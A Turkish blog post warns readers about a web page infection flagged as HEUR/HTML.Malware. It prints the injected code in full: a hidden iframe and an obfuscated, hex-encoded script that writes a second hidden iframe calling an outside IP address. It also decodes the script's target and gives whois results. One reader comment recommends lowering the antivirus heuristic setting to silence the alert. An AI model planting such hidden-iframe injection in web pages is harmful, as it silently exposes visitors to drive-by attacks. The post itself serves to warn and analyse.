HEUR/HTML.Malware Virüsüne dikkat…

Merhaba arkadaşlar bir internet sayfasında surf yaparken denk geldim… HTML kodları arasına bulaşan bu virüsü bir kısım antivirüs programları algılamıyor malesef. Şuan deneme amaçlı kulllandığım Antivir programı hemen beni uyardı. Söylediğim gibi sörf yaparken denk geldim bu uyarıya.. Öncelikle birkaç antivirüs programı ile kontrol ettim ama yakalamadılar. Sadece Antivir mi yakalıyor ? O zaman bir yanlış anlaşılma olabilir dedim.

Yanlış bir alarm olup olmadığını kontrol için hemen eplorer de sağ tıklayıp kaynağı görüntüle yaptım… HTML kodlarını yukarıdan aşağıya doğru inerken </body> </html> kodlarından sonra aşağıdaki kodlara denk geldim…

</body>
</html>
<iframe src='http://url ' width='1' height='1' style = 'visibility: hidden;'> </iframe> <script> function v4804105e4e5e9(v4804105e4eda0){ function v4804105e4f56f () {return 16;} return(parseInt(v4804105e4eda0,v4804105e4f56f()));}function v4804105e5050c(v4804105e50ce5){ function v4804105e524c7 () {var v4804105e52cc0=2; return v4804105e52cc0;} var v4804105e514d9='';for(v4804105e51cd1=0; v4804105e51cd1<v4804105e50ce5.length; v4804105e51cd1+=v4804105e524c7()){ v4804105e514d9+=(String.fromCharCode(v4804105e4e5e9(v4804105e50ce5.substr(v4804105e51cd1, v4804105e524c7()))));}return v4804105e514d9;} document.write(v4804105e5050c('3C5343524950543E77696E646F772E7374617475733D2744 6F6E65273B646F63756D65 6E742E777269746528273C6 96672616D65206E616D653 D37207372633D5 C27687474703A2 F2F37372E323231 2E3133332E313 9302F2E6966 2F676F2E68746D6C 3F272B4D61746 82E726F756E6 4284D617468 2E72616E64 6F6D28292A36 3930292B27 3338303735353 7655C272077 696474683D363 920686569676 8743D313020737 4796C653D5C276 46973706C6179 3A206E6F6E 655C273E3C2F 696672616D653E2 7293C2F5343524 950543E')); </script>

Tabiki kodları incelemeye aldım. Gördüm ki bu kodlar sayfanın en altına bir iframe açmakta ve gizli olarak açmakta…

<iframe src='http://url ' width='1' height='1' style = 'visibility: hidden;'> </iframe>

Scriptide bu iframe içerisinde çalıştırıyor. Tabiki “hidden;” kodunu görmüşsünüzdür. Yani gizli olarak açmakta. Kullanıcı hiçbir şekilde fark etmiyor…

Bu iframe içersinde scripti çalıştırıyor. Script ise 77.221.133.190 ip adresine bağlanmakta.

http://77.221.133.X/.if/go.html?[random_nr]

Scrip çalıştığında bu hale geliyor…

İp adresini sorguladığımda ise

Results:
% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Note: This output has been filtered.
% To receive output for a database update, use the “-B” flag.

% Information related to ‘77.221.128.0 – 77.221.143.255’

inetnum: 77.221.128.0 – 77.221.143.255
netname: DATAPOINT-NET2
descr: Colocation and virtual hosting
descr: For abuse, spam an other comliants mailto:[email protected]
country: RU
admin-c: IBA-RIPE
tech-c: IBA-RIPE
status: ASSIGNED PA
mnt-by: INFOBOX-MNT
source: RIPE # Filtered

person: Infobox Abuse Manager
address: 29, Viborgskaya nab.,
address: 198215 Saint Petersburg, Russia
e-mail: [email protected]
phone: +7 812 3312999
nic-hdl: IBA-RIPE
mnt-by: INFOBOX-MNT
source: RIPE # Filtered

% Information related to ‘77.221.128.0/19AS30968’

route: 77.221.128.0/19
descr: DATACENTER2
origin: AS30968
mnt-by: INFOBOX-MNT
source: RIPE # Filtered

Rusyada bir datacenter karşıma çıkıyor. Aman dikkat işin içerisinde RUSLAR varsa dikkat etmek lazım:)

Script çalıştığında çıkan sonuç..

<iframe src=”http://77.221.133.X/.dif/go.php?sid=1″ style=”border:0px solid gray;” WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>

Tavsiyem bu virüsü yakalayabilen bir anti-virüs programı ile sisteminiizi taratmanızdır. Birdefender ve Antivir bizzat denedim yakalayabiliyor.. Çok tehlikeli bir virüs değil.Tam olarakda sistemde yani windows’ta ne yapıyor bilmiyorum. Bunuda biraz araştıracağım. Tabi öncelikle kendi sistemime bulaştırdığım bu virüsü kaldıracağım sonrada site sahibini uyaracağım. Eminim farkında bile değildir….

SONUÇ :

En iyi virüs programı yoktur…

Birçok program iyidir fakat en iyisi diye bir belirleme yapamayız.

Bazıları anti-virüslerde iyidir trojanlarda zayıf bazıları trojanlarda çok iyidir fakat virüslerde zayıf bazılarıda güvenlik duvarında iyidir fakat diğer yönleri zayıf olabilir…

 

“HEUR/HTML.Malware Virüsüne dikkat…” üzerine 17 yorum

  1. Evet bende de aynı sorun var, yanlış alarm diye düşünmüştüm fakat, avirayı doğrusu tebrik ediyorum. Gitti gidiyor sitesinde daha doğrusu php temelli sitelerde ve forumlarda virüs aktive oluyor. Bunu silmek için ayrı bir araç gerek sanırım.

    Cevapla
  2. Avirayı açın F8 e basın expert mode işaretleyin
    guard-scan sekmesinden heuristic enable AheAd> ayarını low yapın düzelecektir.

    Cevapla

Yorum yapın

teakolik hamza şamlıoğlu blog logo

Wordpress altyapısını kullandığımız bu sistem, Sunucu Çözümleri firmasında yüksek performans sağlayan özel sunucularda barındırılmaktadır. Görüntülemek için en iyi Chrome tarayıcı, 1920x1080 çözünürlük ve Full HD Android telefonlarda çalışır. Ayrıca Sitedeki içeriği istediğiniz gibi çarpabilirsiniz. :)